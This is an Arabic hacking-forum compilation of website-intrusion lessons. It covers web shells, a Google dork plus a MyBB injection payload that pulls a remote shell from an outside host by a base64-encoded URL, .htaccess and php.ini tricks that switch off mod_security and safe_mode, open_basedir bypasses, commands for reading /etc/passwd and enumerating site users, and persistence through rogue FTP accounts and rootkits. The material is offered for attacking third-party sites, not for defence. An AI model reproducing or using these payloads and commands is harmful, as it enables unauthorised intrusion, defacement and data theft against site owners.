bahattab
18-09-2009, 02:41 PM
[مُهم] مُصطلحات ومفاهيم فى اختراق المواقع .
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
درسنا عن:
:: مفاهيم أختراق المواقع وبعض المعلومات عن الشل ::
من المعروف لأختراق اي شيىء لابد لابد من وجود ثغـرة تمكنك من أختراقة
معناته ان اهم شي قبل الأختراق هو وجود ثغرة .. ونقصد بالثغرة اي الثغرات الخطيره التي تمكنك من رفع شل على الموقع
اختراق المواقع بسيط جداً لأنه يتطلب منك شيئين:
1- ان يكون لديك معرفة بأستخدام الشل.
2- ان تكون ملم بأستخدام الأوامر سواء كانت اوامر الدوس او اوامر الينكس وهذا الأهم.
البعض يسأل عن الشل ويسمع عنه كثير ولا يعرفه ؟
الشل بأختصار هو سكربت تجسس تستطيع بواسطتة تنفيذ أوامر لجمع أكبر قدر من المعلومات تمكنك من أختراق الموقع
طبعاً الشل انواع كثيرة ليس نوعاً واحد لاكن جميعها الهدف منها تنفيذ الأوامر .. اي مهما اختلف عليك شكل الشل
أعرف ان الهدف واحد وهو تنفيذ الأوامر.
طيب البعض يسأل ماهي أوامر الدوس ؟
الدوس هو موجة الأوامر في نضام الوندوز الي بواسطتة تستطيع فعل كل شيء فقط المطلوب معرفة الأوامر الخاصة به وكيف تستخدم
و اوامر الدوس لا تهمنا كثيراً ولا يتطلب منك معرفتها "الأن" لاكن كتبتها للفائدة فقط.
مايهمنا هو (( اوامر الينكس )) ومادمت هاوي اختراق المواقع لابد ان تتعرف على هذه الأوامر وان شاء الله سيخصص درس مفصل عنها
ذكرنا انه لابد من معرفة اوامر الينكس البعض يسأل .. ماهو الينكس؟
هو نضام تشغيل مثل الوندوز الذي تستخدمة ويهمنا معرفة اوامره لكي نستخدمها عندما نتمكن من رفع شل على احد المواقع
مازلنا نذكر الشل حتى هنا ولم نكتفي بالتعريف السابق .. لا تقلق لن تخرج من هذا الدرس الا وقد تعرفت عليه ان شاء الله
يدور برأسي سؤال وهو لماذا ذكرنا الأنضمة هنا مع ان الدرس لأختراق المواقع وليس لأختراق الوندوز او الينكس ؟
لأن من المعروف ان المواقع تكون على سيرفر وهذا السيرفر لايعمل الى بنضام تشغيل اي ان السيرفر في الأصل جهاز لاكن بقدرات اقوا جداً من الجهاز المكتبي الذي تستخدمة الأن
وعند رفع الشل الى احد المواقع على هذا السيرفر فأنك توجه الأوامر للسيرفر بأن يفعل .... على الموقع الـ .... طبعاً تكون مقيد بشروط وصلاحيات ولن ينفذ اي امر توجه اليه لأنك مقيد بأوامر معينة لا تستطيع ان تخرج عنها ولن يتعرف على غيرها.
نضرب مثال : لو اردت ان تأمر اخوك الصغير وتقول له جب لي عصير من الثلاجة وهو لا يعرف سوا اللغة العربية هل سيفهم لو قلت له هذا الأمر باللغة الأنجليزية .. اكيد لا .. وان قلت له باللغة العربية راح يفهم وينطلق الى الثلاجة ان وجد العصير اتى به وان لم يجده بيرجع لك يديه فاضية http://www.atyafonline.com/vb/imgcache/3694.png
اذاً تنفيذ الأوامر بالشل شبيه بالمثال ولنفترض ان السيرفر هو اخوك الصغير .. والعصير هو ملف ما .. والثلاجة هي الموقع الذي نريده .. وانت موجه الأوامر
بهذي الحالة يكون الأمر : طلب من السيرفر بأحضار "قراءة" الملف الموجود في الموقع المراد.
إن وجد الملف عرضه لك وأن لم يجده ماراح يعرض لك شي طبعاً
المثال اعلاه للتبسيط وإصال المعلومة فقط !
-------------
اوامر الشيل :-
safe mode : حالة الوضع الأمن (الحماية) وسيكون أمامها اما OFF أو ON
Disable functions : هنا الدوال المعطلة في السيرفر .
Run command : هنا تكتب الأمر الذي تريد تنفيذة او في شيلc99 تكون Execute Command
Work directory : هنا مسار تواجدك .
بعض المعلومات منقولة من mr.W olf
ولكن كتابه الدرس من كتابتي .. شكراً لكم
ممكن هده الصور تفيد بعض الأخوة المبتدئي
هده صور و اللي فيها الوضع الأمني و معلومات المقع متل اصدار القاعدة ونضام التشغيل اما للينكس اما ويندوز
http://www.atyafonline.com/vb/imgcache/3698.png
و هده الصورة للمكان المخصص لكتابة الاوامر
http://www.atyafonline.com/vb/imgcache/3699.png
و هده صورة الشل c99 بصفة عامة
http://www.atyafonline.com/vb/imgcache/3700.png
و هده صورة للشيل sniper_sa المعرب
http://www.atyafonline.com/vb/imgcache/3701.png
للاشارة فانه يوجد عدة أنواع من الشيلات
---------------------------------------------------------
[ من طرق رفع الشيلات . ] رفع شيل على myBB .[ للمبتدئين ] السلام عليكم
النهردة جايب لكم شرح لرفع الشيل ..
واخترت سكربتmyBB كـ . بدايه لكم
نبدأ على بركة الله . :
اول حاجة جبت لكم ثغرة للـmyBB كان مطروحة بالميلورم .
نبدأ على بركة الله
دورك البحث
كود PHP:
Powered By MyBB Copyright © 2002 inurl:forumdisplay.php?fid=2
حطة ف قوقل .. واختار اى موقع , واذا مظبطش موقع معين اختار غيرة حتى تلاقى موقع مصاب http://www.atyafonline.com/vb/imgcache/3707.png
ولمايطلعلك موقع مثال : -
www.xx.com/forum (http://www.xx.com/forum)
حط وراه الاستغلال
كود PHP:
forumdisplay.php?fid=2&sortby=];include(base64_decode(aHR0cDovL2RqZWttYW5pNGV2ZXI uZnJlZS5mci9zaGVsbC50eHQ));exit;//
لاحظ ان :
كود PHP:
aHR0cDovL2RqZWttYW5pNGV2ZXIuZnJlZS5mci9zaGVsbC50eH Q
تشفيرة للشل :
كود PHP:
http://djekmani4ever.free.fr/shell.txt
يعني لازم تشفر رابط الشيل قبل ماتعمله انكلود او لود .
مع ملاحظة اذاهتشفر غير الشل دة و تطلعلك بنتيجة التشفير علامة = احذفها وخد الباقي وحطة بنفس المكان....
تطبيق سريع :
http://www.atyafonline.com/vb/imgcache/3708.png
--------------------------------------------------------
تخطي تغيير مسار بورت الدخول للشل [ssh]
السلام عليكم
درسنا النهردة هو سهل وبسيط
في اغلب الاوقات لما يجيلك رووت سيرفر بأي طريقة ما .
تدخل اللوحة
وعاوز تغير الاندكسات تغير باسورد كل اف تي بي يدوي :s .
وطبعاً في حالة 500 موقع مش هتقدر تغير كلة
في الحالة دى هندخل للـPutty.
طب حطيت الاي بي عشان تدخل لروت .
هيقولك Connection refused او اى رسالة اخرى المهم انة مش هيرضى يدخلك
عشان بورت الشل الافتراضي متغير .
وزي ماحنا عارفين ان بورت الشل الافتراضي 22
في الحالة دى هنعمل كدة
هنضيف الرابط دة لخلف الاي بي
كود PHP:
http://ip:2086/******s2/doautofixer?autofix=safesshrestart
'طب اية فايدة الرابط دة ؟
هو انة هيعمل ريستارت وهيرجع البورت للافتراضي اللى هو 22 .
بعد لما تحط الرابط ورا الاي بي هيطلعلك كدة :
اقتباس Requesting ****** ... Done.
Executing ****** ...
Attempting to locate sshd binaries installed on the system ...
Located /usr/sbin/sshd
Done.
Killing exisiting sshd processes...
Stopping sshd: [ OK ]
killed 3422 Done.
حقوق الرابط محفوظة لـ كتب ومراجع اللينكس :D .
---------
رد: تخطي تغيير مسار بورت الدخول للشل [ssh]
مشكور
بس اذا عندك روت ليش تكشف نفسك بتغير البورت للافتراضي؟؟
كود PHP:
/etc/ssh/sshd_config
حتلاقي
كود PHP:
Port 5353
مثلا تروح تتصل عليه
و على العموم ssh فيه اعدادات كثيرة ﻻزم تنتبه لها
و على فكرة الطريقة الي ذكرتها فقط لـ Cpanel
مشكور مرة ثانية GoLdeN-z3r0
تحياتي
-------------
رد: تخطي تغيير مسار بورت الدخول للشل [ssh
اهلاً Cyber .
اناحاط الطريقة كـ بداية لـ انواع التخطي .
احنا ناخدها واحدة واحدة لحد لمانوصل لحل نهائي .
اساسأً اغلب الروت الاجنبيه بتكون 22
بس عادى يعنى كـ نقاش .
وشكرا ع الاضافة يامان
رد: تخطي تغيير مسار بورت الدخول للشل [ssh]
السلام عليكم
انا رفعت شل c99 على موقع ونجحت في ذلك ولكن لااعرف كيفية الدخول الى الشل و البدئ في الاختراق
اولاً على حسب اذا كنت رفعتة في FTP فـ اكيد انك رفعتة في البابلك [ public_html ] .
او اذا كنت رفعته من السكربت فـ على حسب مسار السكربت ونوع السكربت .
اذا كنت رفعته من الاف تي بي فـى هذا المسار public_html او www .
فـ راح يكون مسار الشيل
www.z3r0.com/shell.php (http://www.z3r0.com/shell.php)
http://sec-r1z.com/showthread.php?t=2601
---------------------------------------------------------
[تخطي ] What About Hataccess & PHP.ini
السلام عليكم
النهردة جآلي مزاج اكتب توبيك .
بأمكاننا اننا نعمل هوايل بملفات معينه زي الـهاتكس والـphp.ini
يعني مثال .
بعض النآس . الـphp.ini عندها مصدر رئيسي فى الاختراق يعني
رفع شيل
SafeMode=on اذاً يرفع php.ini
مظبطش يبقى يلا ودور ع سيرفر اخر ..
طب دلوقتى عندى فكره .
نفتح ملف هاتكس
ونكتب
كود PHP:
AddHandler cgi-script .cpc
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheck******Format Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalize******s Off
</IfModule>
suPHP_ConfigPath /home/user/public_html/php.ini
طيب تمام .
نرفع ملف الـphp.ini كالمعتاد
كود PHP:
safe_mode = Off
وخبروني نتيجة ^^
طبعاً الطريقه مجربه كذا مرة
ونسبة النجاح 99%
وهطرح موضوع للسيرفرات اللى تواجه مشاكل ف الهاتكس
----------------------------------------
الحقوق محفوظة :
z3r0
www.Sec-Evils.Com (http://www.sec-evils.com/)
SecurityEvils Gr0up
-------------------------------------------------------
السيرفرات نعرف معظمهما تنصب المود سيكيورتي Modsecurity
واللحين نجي نحلل الكود htaccess حقك خوي جولدن لنعرف وش الطريقة الي نستخدمها مع السيرفر
كود PHP:
AddHandler cgi-script .cpc
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheck******Format Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalize******s Off
</IfModule>
suPHP_ConfigPath /home/user/public_html/php.ini
الكود بلسطر الاول وهو بحالة منع السيرفر لتشغيل ملفات السي جي اي cgi telnet
طيب ضفنا الكود هاذ ببداية الهتاكس
كود PHP:
AddHandler cgi-script .cpc
هاذ الكود يعطينا المجال لنشغل اي ملف سي جي اي وبلمرفق تلقوا الشل الي اقصده وباسوورد دخول هو sec-r1z
هذا بلنسبة للكود الاول .. وهو خاص بتشغيل السي جي اي علسيرفر ذا كان ممنوع
نجي للمود بحالة السيرفر كان منصب الرولز للمود سيكيورتي علسيرفر ونبي نتخطاه
من خلال الكود هاذ
كود:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheck******Format Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalize******s Off
</IfModule>
طبعا يقولون البعض من الي مايعرفون للرولز وش هو الرولز ؟ وش هو المود ؟ الامور هذه كلها جاية بلقسم هاذ وبنشرحها خطوة خطوة وبنشرح كيف بتضيفوا الرولز علسيرفر وكيفية تعطيله وكيفية تخطيه ... ولاكن هدفنا بلدروس هذه توصيل المعلومة من الصغير للكبيره للجميع
اللحين تمام ... عطلنا المود وفلترة المجلد الي حنا بيه .. لانه بلطبع عند اضافة ملف htaccess داخل مجلدنا مو معناته وقفنا حماية السيرفر كاملة .. ولكن وقفنا الحماية بلمجلد الي رفعنا الفايل عليه فقط ! يعني
كود:
home/sec-r1z/public_html/0x00
اللحين حنا داخل سيرفر sec-r1z.com
وبلضبط مسارنا داخل مجلد 0x00 علسيرفر , يعني وقت نرفع الفايل htaccess على مسار المجلد الي هو 0x00 راح يتم توقيف المود بلمجلد هاذ فقط ! وتشغيل السي جي اي تل نت علمجلد هاذ فقط ... للحين تمام ... وكل شي واضح ومبين
نجي للسطر الي بعده
طبعا الاغلبية ماتمشي على السيرفر لانه يحتاج يكون منصب فايل التعريف للموقع من ملف الاباتشي الي هو php.ini ومساره عادة بلسيرفر يكون
كود:
/etc/httpd/cond/httpd.conf
طيب ...
كود:
suPHP_ConfigPath /home/user/public_html/php.ini
والله بلضبط ماني ذاكر بس اذكر اني قرات موضوع للشباب باحد المنتديات يقولون وش سببه ... والي اذكره انه تخطي لحماية المود من خلال الملف php.ini هاذ بحالة كان موجود على مسار الموقع
يعني نفترض الملف موجود على هاذ المسار بلسيرفر
كود:
/home/user/public_html/php.ini
وحنا على هاذ المسار
كود:
/home/user/public_html/wehere
يعني الملف وظيفته انه يسحب الاعداد الرئيسي للسيرفر من
كود:
الى مجلدنا اي مسارنا
كود:
/home/user/public_html/wehere
بنقدر نتخطى اعدادات الملف الموجودة على المسار الرئيسي للموقع .
كود:
/home/user/public_html/php.ini
هذا تحليل الكود الاول للاخ جولدن والله اعلم .. الكود الثاني ببساطة
كود:
safe_mode = Off
بحيث يكون على مسارنا بإسم php.ini ومنه نقوم بتوقيف السيف مود علسيرفر إن كان مفعل ...
طبعا والله اعلم الكود الاول خاطىء ولاكن الاخوان قامو بجمع معلومات التخطي كاملة للسيرفرات ووضعها بكود واحد ..ز يعني إن صابت صابت وإن خابت خابت .. ولاكن الطريقة فعاله بإذن الله مع اني ماجربتها والله .. ولاكن كمعنى للاوامر ومهام لها اتوقع يتخطى الحماية وبلطبع في طرق ثانية بنقوم بشرحها بلدروس القادمة بإذن الله مع الايام ..
اللحين اي استفسار على شرح الاخ جولدن او شرحي حاظرين شباب .. ومايردكم الا لسانكم xD الملفات المرفقة
http://www.atyafonline.com/vb/imgcache/3689.png cgitelnet.zip (http://sec-r1z.com/attachment.php?attachmentid=118&d=1240611070) (6.2 كيلوبايت, المشاهدات 18)
ملف الهتاكس مايكون ممنوع يخوي , ذايكون معرف بملف الاباتشي httpd.conf يكون شغال ذامايكون معرف تشوف اذا تقدر تلعب بلphp.ini او انك تقرا ملف الاباتشي او ترفع سكربت php تتخطى حماية السيرفر عن طريق اي داله جديدة ...
شف الثغرات الموجودة هنا وبلاخص الي تكون اخرها bypass او اولها ...
http://www.milw0rm.org/related.php?program=PHP
http://sec-r1z.com/showthread.php?t=1283
----------------------------------------
تخطي الآوبن بآس دي عندما تكون صلاحيتك نوبدي ولاتستطيع التنقل
السلام عليكم .. :/>
اعذروني ع الانقطاع . بس مشاغل والله http://www.atyafonline.com/vb/imgcache/3703.png
ع العموم نبدأ بالدرس .
درس سهل وخفيف .
وهو يتكلم عندما تكون صلاحيتك nobody ولماتتنقل يديك انك متقدرش تتنقل [ اكنك يوزر]
ودة مايعرف بآلـOpenBaseDir >
,وتخطيهـآ سهل . وهو =)
مثلاً عندنا شل ع الموقع دة
www.r0xz3r0x.com/shell.php (http://www.r0xz3r0x.com/shell.php)
هيكون التخطي .
ip/~user/shell.php
نيجي نحلل اكتر
اية اللى انا كتبته دة
ip : اي بي السيرفر .
user : يوزر موقع r0xz3r0x .
وبعدين بقى مسآر الشيل عادى
وهتلاحظ انك لماتتنقل مش هتلاقى اى صعوبة .
مثال :
r0xz3r0x.com/shell.php
-
يوزر موقع r0xz3r0x.com هو Golden
الاي بي بتاع السيرفر : 201.123.456.89
مسار الشيل : shell.php
هيكون التخطي كالتالي
http://201.123.456.89 (http://201.123.456.89/)/~golden/shell.php
لاحظ لازم [ /~ ] عشان تربط بين اى بي السيرفر والموقع .
دلوقتى خلصت درسي .. واللى عندة اسئلة يتفضل يسئل
محدش يجي يقولي انا بتنقل متنقلتش لية وف الاخر تلاقى صلاحيته يوزر http://www.atyafonline.com/vb/imgcache/3694.pnghttp://www.atyafonline.com/vb/imgcache/3694.png
السلام عليكم
http://sec-r1z.com/showthread.php?t=2267
---------------------------------
من طرق البقاء على السيرفر اطول فتره .
السلام عليكم .
اولاً الموضوع لزيادة المعلومات .
نبدأ فى الموضوع .
في طرق كتيرة منها تقدر تزور السيرفر اكتر من مرة فى حال حذف الشيل ..
اولاً اول مايجيلك شيل
خمن الباسورد واغلب الاوقات يكون باسورد الاف تي بي مطابق لاي كونفيق لسكربت للموقع
----------------------------
طب عندك سي بنل موقع .. ادخل السي بنل
www.z3r0.com:2082 (http://www.z3r0.com:2082/)
بعدين FTP Accounts .
وبعدين تضيف يوزر وباسورد هيطلعلك زي الصورة دى .
http://www.9o9i.com/uploads/images/9o9i-a2d2b613f2.jpg (http://www.9o9i.com/uploads/images/9o9i-a2d2b613f2.jpg)
طب دة فى حالة انك شيل او سي بنل ,
----------
دلوقتى نيجي لحالة الرووت ..
لو انت root على السيرفر وعاوز تضمن انك ترجع للسيرفر كل شوية .
تقدر بواسطة الـ rootkit .
شرح بسيط للروت كيت
هو عبارة عن برنامج يأتي باشكال مختلفة ووظائف متعددة. يسمح للهاكرز اذا اخترق سيرفر واخذ رووت أن يحافظ له على الرووت وعلى أشياء اخرى.. كلمة Root تعني المسؤول عن النظام في لينكس مثل الـAdministratr الي في الويندوز ، وكلمة Kit تعني مجموعة من الأدوات مجمعة مع بعضها.
مكونات الرووت كيت [ لزيادة المعلومات ]
يتكون الـRK من الأشياء التالية [ راح نشرحها بالتفصيل ان شاء الله]:
1-الباكدور Backdoorz : بأنواعه المختلفة مثل "telnetd" ، "Login Backdor".
2-الـ Sniffers:التجسس على خدمات الشبكة مثل "FTP ، TELNET".
3-ادوات الـLogz : تقوم بالتعديل والمسح في اللوج حتى لا تنكشف.
4-ادوات DDOS : الي يسموها بالعربي " هجوم حجب الخدمة" شبيهه بالـPing في الدوس لكنها اقوى من الي في الويندوز بكثييير.
5-IRC/Bots.
6-السكربتات الخبيثة : زي بعض انواع الأكسبلويتات والسكربتات الي تخرب في النظام.
--
دلوقتى عرفنا بعض الطرق .. طبعاً دى طرق افتراضية يعني الـSecurity يقدر يتخلص من البرامج دى اذا عمل سكان على السيرفر بواسطة اى برنامج سكيورتي .. ومن البرامج دى AVG Anti-Rootkit Free .
المهم دلوقتى احنا عرفنا بعض الطرق اللى ممكن نتعامل بيها .
وفي الدروس القادمه اذا كان لينا عمر او في نفس الموضوع هشرح طرق جديدة .
والسلام عليكم
ممكن تلغم كل منتديات السيرفر من ملف faq مثلاً !!!
http://sec-r1z.com/showthread.php?t=2536
-----------------------------------------
طريقة كشف يوزر اى موقع على السيرفر في حالة
Access Denied . السلام عليكم
انا هشرح النهردة ازاي تكشف اى يوزر لموقع انت رافع عليه شيل
طبعاً في اغلب الاوقات .. الناس ترفع شيل في حالة الاستهداف تيجي تنفذ امر
يقولك : Access Denied . او يديك زي الصورة دى
(http://www.atyafonline.com/vb/imgcache/3704.png)
http://www.atyafonline.com/vb/imgcache/3704.png (http://www.atyafonline.com/vb/imgcache/3704.png)
'هشرح حل بسيط لكشف اليوزر لآي موقع
وهو امر :
كود PHP:
ls -la /etc/valiases/z3r0.com
نفذ الامر مع تغيير اسم z3r0.com لاسم الموقع اللى عاوز تطلع اليوزر بتاعه
هيديك الناتج :-
كود PHP:
-rw-r--r-- 1 z3r0 mail 902 Jul 2 12:51 /etc/valiases/z3r0.com
طبعاً في طرق كتيرة .. للتخطى ومنها
كود PHP:
cat /etc/passwd
وجرب يوزر يوزر http://www.atyafonline.com/vb/imgcache/3705.png بالطريقة دى
كود PHP:
ipserver/~user
ودى فى حالة ان السيرفر عدد سيرفراته قليل ..
و1% اللى سيرفراته كدة http://www.atyafonline.com/vb/imgcache/3705.png .
---------
طريقة حلوة ولاكن كيوزر لموقع علسيرفر صعب يتم منع اي nobody - apache للوصول له, لانه بكل بساطه معظمهم تلقاهم بملف الاباتشي, سواء كان عليه سي بانل للسيرفر او لا
كود:
cd /etc/httpd/conf;cat httpd.conf
وايضا طريقتك جميلة, بلإضافة للتاكد من عنوان الايبي للموقع بحالة ماقدرتوا تلاقوه والتاكد من ايبي سيرفرك, ذا كان نفسه ومالاقيتوه احتمال 50% يكون سيرفر jail account, اي كل حساب وله مساره وموديلاته الخاصه, او مجموعه خاصة, كله يعتمد على ذكاء وطريقة توزيع الادمن للمجموعات الي يسويها بلسيرفر, طبعا من خلال الايبي نقدر نحكم يا يكون سيرفر jail account,يا مغير اعدادات الاباتشي بكيفه ( الادمن ) Advanced security.
وفي طريقة ثانية عن طريق
كود PHP:
/var/mail
http://www.atyafonline.com/vb/imgcache/3706.png (http://smarterfox.com/wikisearch/search?q=%D9%88%D9%81%D9%8A%20%D8%B7%D8%B1%D9%8A%D 9%82%D8%A9%20%D8%AB%D8%A7%D9%86%D9%8A%D8%A9%20%D8% B9%D9%86%20%D8%B7%D8%B1%D9%8A%D9%82%0D%0A%0D%0A%D9 %83%D9%88%D8%AF%20PHP%3A%0D%0A%2Fvar%2Fmail%20%0D% 0A&locale=en-US)http://www.youtube.com/favicon.ico (http://www.youtube.com/results?search_query=%D9%88%D9%81%D9%8A%20%D8%B7%D 8%B1%D9%8A%D9%82%D8%A9%20%D8%AB%D8%A7%D9%86%D9%8A% D8%A9%20%D8%B9%D9%86%20%D8%B7%D8%B1%D9%8A%D9%82%0D %0A%0D%0A%D9%83%D9%88%D8%AF%20PHP%3A%0D%0A%2Fvar%2 Fmail%20%0D%0A)http://www.google.com/favicon.ico (http://www.google.com/search?q=%D9%88%D9%81%D9%8A%20%D8%B7%D8%B1%D9%8A%D 9%82%D8%A9%20%D8%AB%D8%A7%D9%86%D9%8A%D8%A9%20%D8% B9%D9%86%20%D8%B7%D8%B1%D9%8A%D9%82%0D%0A%0D%0A%D9 %83%D9%88%D8%AF%20PHP%3A%0D%0A%2Fvar%2Fmail%20%0D% 0A)
طريقة اخرى :
ls -la /etc/valiases -user z3r0
http://www.atyafonline.com/vb/imgcache/3706.png (http://smarterfox.com/wikisearch/search?q=%D8%B7%D8%B1%D9%8A%D9%82%D8%A9%20%D8%A7%D 8%AE%D8%B1%D9%89%20%3A%0D%0A%0D%0Als%20-la%20%2Fetc%2Fvaliases%20-user%20z3r0%0D%0A&locale=en-US)http://www.youtube.com/favicon.ico (http://www.youtube.com/results?search_query=%D8%B7%D8%B1%D9%8A%D9%82%D8%A 9%20%D8%A7%D8%AE%D8%B1%D9%89%20%3A%0D%0A%0D%0Als%2 0-la%20%2Fetc%2Fvaliases%20-user%20z3r0%0D%0A)http://www.google.com/favicon.ico (http://www.google.com/search?q=%D8%B7%D8%B1%D9%8A%D9%82%D8%A9%20%D8%A7%D 8%AE%D8%B1%D9%89%20%3A%0D%0A%0D%0Als%20-la%20%2Fetc%2Fvaliases%20-user%20z3r0%0D%0A)
الطريقة اللى حطتها فوق دى .
تكشف لك يوزر الموقع دة لاي موقع
يعني لو على سيرفر انت ونفذت cat /etc/passwd .
هيطلعلك نتائج
خد اى يوزر ونفذ
ls -la /etc/valiases -user siteuser
وهيطلعلك اسم الموقع الخاص باليوزر دة
كمان مرات كثيرة لاتستطيع قراءة
/etc/passwd
بالامر المعتمد cat /etc/passwd
او ln -s /etc/passwd r1z.txt
بسبب منع بعض الاوامر بالسيرفر
الحل تنفيذ الامر هذا
awk -F: '{ print $1 }' /etc/passwd | sort
ولو بدنا نعرض اليوز مع المسارات
ننفذ هذا الامر
awk -F: '{ print $1 " "$2 " " $3" "$4" "$5 " "$6" "$7" "}' /etc/passwd | sort
انشا الله نكون افدناكم
http://sec-r1z.com/showthread.php?t=2358
---------------------------------------------------------------
تخطي الحماية بواسطة بعض الآوامر
[ Easy & Intersting ]
السلام عليكم ورحمة الله وبركآتة
كيفكم اخواني ..
اولاً :-
اعتذر عن عدم تقديم بقية دروس الدورة ولكن مشاغل والله
المهم ..
نبدأ الان ف الدرس :-
الدرس هو [ فكرة ] تقريبأً وممكن نعيش عليها --
نبدأ على بركة الله ..
فى بعض السيرفرات لماتيجي تنفذ امر [ ls -la /etc/passwd ] - يديك access denied او نافذة مفهاش كتابه او اى حاجة ..
و لو كتبت cat /etc/passwd نفس الكلام .
المهم :-
هنا تقريباً في حل . فى بعض السيرفرات
etc passwd :D - - -
كود:
awk -F: '{ print $1 }' /etc*/passwd | sort
etc /passwd 2 but intersting - هنا يديك المواقع معاه .
كود:
awk -F: '{ print $1 " "$2 " " $3" "$4" "$5 " "$6" "$7" "}' /etc*/passwd | sort
ترقبوناّ في حلقات اخرى :D
./z3r0
SecurityRules
sec-r1z.com
وتقدر عن طريق الامر هذا بكل بساطة
كود:
cd /etc;cat passwd
http://www.atyafonline.com/vb/imgcache/3709.png (http://smarterfox.com/wikisearch/search?q=%D9%88%D8%AA%D9%82%D8%AF%D8%B1%20%D8%B9%D 9%86%20%D8%B7%D8%B1%D9%8A%D9%82%20%D8%A7%D9%84%D8% A7%D9%85%D8%B1%20%D9%87%D8%B0%D8%A7%20%D8%A8%D9%83 %D9%84%20%D8%A8%D8%B3%D8%A7%D8%B7%D8%A9%0D%0A%0D%0 A%D9%83%D9%88%D8%AF%3A%0D%0A%0D%0Acd%20%2Fetc%3Bca t%20passwd%0D%0A%0D%0A&locale=en-US)http://www.youtube.com/favicon.ico (http://www.youtube.com/results?search_query=%D9%88%D8%AA%D9%82%D8%AF%D8%B 1%20%D8%B9%D9%86%20%D8%B7%D8%B1%D9%8A%D9%82%20%D8% A7%D9%84%D8%A7%D9%85%D8%B1%20%D9%87%D8%B0%D8%A7%20 %D8%A8%D9%83%D9%84%20%D8%A8%D8%B3%D8%A7%D8%B7%D8%A 9%0D%0A%0D%0A%D9%83%D9%88%D8%AF%3A%0D%0A%0D%0Acd%2 0%2Fetc%3Bcat%20passwd%0D%0A%0D%0A)http://www.google.com/favicon.ico (http://www.google.com/search?q=%D9%88%D8%AA%D9%82%D8%AF%D8%B1%20%D8%B9%D 9%86%20%D8%B7%D8%B1%D9%8A%D9%82%20%D8%A7%D9%84%D8% A7%D9%85%D8%B1%20%D9%87%D8%B0%D8%A7%20%D8%A8%D9%83 %D9%84%20%D8%A8%D8%B3%D8%A7%D8%B7%D8%A9%0D%0A%0D%0 A%D9%83%D9%88%D8%AF%3A%0D%0A%0D%0Acd%20%2Fetc%3Bca t%20passwd%0D%0A%0D%0A)
في كمان
كود PHP:
ls -la /etc/valiases/xxx.com
cat /etc/valiases/xxx.com
بس اذا كانت الصلاحيات على الملف
كود PHP:
/etc/passwd
وﻻ على الامر cat
اذا كانت الصلاحيات ما تقدر تقراه بأي امر اﻻ اذا فيه ثغرة
اما اذا كان عامل صلاحيات على cat فالطريقة تكون فعال
من الناحية هذه ياسايبر تقدر تستخدم التخطي عن طريق داله معينه مثلا ,,, او اذا جبت باسوورد للسيكيول تقدر تتخطاها بصلاحية السيكيول ( كيوزر ) ... اذكر موضوع للدكتور ناقشنا فيه عن الصلاحيات للسيكيول ( كيوزر ) للوصول كروت ... لاكن ماوصلنا لنتيجة فيها بس الفكره تزبط اكيد !
لو معاك اي معلومات قاعدة تتخطى المشكلة من دالة mysql
http://sec-r1z.com/showthread.php?t=2040
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
درسنا عن:
:: مفاهيم أختراق المواقع وبعض المعلومات عن الشل ::
من المعروف لأختراق اي شيىء لابد لابد من وجود ثغـرة تمكنك من أختراقة
معناته ان اهم شي قبل الأختراق هو وجود ثغرة .. ونقصد بالثغرة اي الثغرات الخطيره التي تمكنك من رفع شل على الموقع
اختراق المواقع بسيط جداً لأنه يتطلب منك شيئين:
1- ان يكون لديك معرفة بأستخدام الشل.
2- ان تكون ملم بأستخدام الأوامر سواء كانت اوامر الدوس او اوامر الينكس وهذا الأهم.
البعض يسأل عن الشل ويسمع عنه كثير ولا يعرفه ؟
الشل بأختصار هو سكربت تجسس تستطيع بواسطتة تنفيذ أوامر لجمع أكبر قدر من المعلومات تمكنك من أختراق الموقع
طبعاً الشل انواع كثيرة ليس نوعاً واحد لاكن جميعها الهدف منها تنفيذ الأوامر .. اي مهما اختلف عليك شكل الشل
أعرف ان الهدف واحد وهو تنفيذ الأوامر.
طيب البعض يسأل ماهي أوامر الدوس ؟
الدوس هو موجة الأوامر في نضام الوندوز الي بواسطتة تستطيع فعل كل شيء فقط المطلوب معرفة الأوامر الخاصة به وكيف تستخدم
و اوامر الدوس لا تهمنا كثيراً ولا يتطلب منك معرفتها "الأن" لاكن كتبتها للفائدة فقط.
مايهمنا هو (( اوامر الينكس )) ومادمت هاوي اختراق المواقع لابد ان تتعرف على هذه الأوامر وان شاء الله سيخصص درس مفصل عنها
ذكرنا انه لابد من معرفة اوامر الينكس البعض يسأل .. ماهو الينكس؟
هو نضام تشغيل مثل الوندوز الذي تستخدمة ويهمنا معرفة اوامره لكي نستخدمها عندما نتمكن من رفع شل على احد المواقع
مازلنا نذكر الشل حتى هنا ولم نكتفي بالتعريف السابق .. لا تقلق لن تخرج من هذا الدرس الا وقد تعرفت عليه ان شاء الله
يدور برأسي سؤال وهو لماذا ذكرنا الأنضمة هنا مع ان الدرس لأختراق المواقع وليس لأختراق الوندوز او الينكس ؟
لأن من المعروف ان المواقع تكون على سيرفر وهذا السيرفر لايعمل الى بنضام تشغيل اي ان السيرفر في الأصل جهاز لاكن بقدرات اقوا جداً من الجهاز المكتبي الذي تستخدمة الأن
وعند رفع الشل الى احد المواقع على هذا السيرفر فأنك توجه الأوامر للسيرفر بأن يفعل .... على الموقع الـ .... طبعاً تكون مقيد بشروط وصلاحيات ولن ينفذ اي امر توجه اليه لأنك مقيد بأوامر معينة لا تستطيع ان تخرج عنها ولن يتعرف على غيرها.
نضرب مثال : لو اردت ان تأمر اخوك الصغير وتقول له جب لي عصير من الثلاجة وهو لا يعرف سوا اللغة العربية هل سيفهم لو قلت له هذا الأمر باللغة الأنجليزية .. اكيد لا .. وان قلت له باللغة العربية راح يفهم وينطلق الى الثلاجة ان وجد العصير اتى به وان لم يجده بيرجع لك يديه فاضية http://www.atyafonline.com/vb/imgcache/3694.png
